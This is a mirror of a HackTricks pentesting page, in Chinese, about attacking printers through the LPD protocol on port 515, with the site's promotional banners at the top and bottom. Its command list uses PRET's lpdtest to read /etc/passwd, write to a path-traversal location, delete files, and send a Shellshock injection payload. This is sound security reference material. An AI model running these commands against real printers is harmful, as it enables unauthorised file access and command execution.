mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
3.4 KiB
3.4 KiB
零基础学习 AWS 黑客攻击直至成为专家 htARTE (HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您希望在 HackTricks 中看到您的公司广告 或 下载 HackTricks 的 PDF 版本,请查看 订阅计划!
- 获取 官方 PEASS & HackTricks 商品
- 探索 PEASS 家族,我们独家的 NFT 集合
- 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上 关注 我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PR 来分享您的黑客技巧。
Line Printer Daemon (LPD) 协议最初是在 80 年代的 Berkeley Unix 中引入的(后来由 RFC1179 规范定义)。
该守护进程运行在 515/tcp 端口,并可以使用 lpr
命令访问。为了打印,客户端发送一个定义作业/用户名的 控制文件 和一个包含实际打印数据的 数据文件。数据文件的 输入类型 可以通过在控制文件中选择 各种文件格式 来设置。然而,如何实际处理打印数据取决于 LPD 的实现。一个流行的 Unix-like 操作系统的 LPD 实现是 LPRng。LPD 可以用作部署 恶意 PostScript 或 PJL 打印作业 的载体。
PRET 包含了 lpdprint
和 lpdtest
工具**。** 它们是直接向 LPD 兼容打印机打印数据或下载/上传/删除文件等的简约方式:
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
如果您想了解更多关于黑客打印机的信息,请阅读此页面。
Shodan
端口 515
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS 红队专家)!
其他支持HackTricks的方式:
- 如果您希望在HackTricks上看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。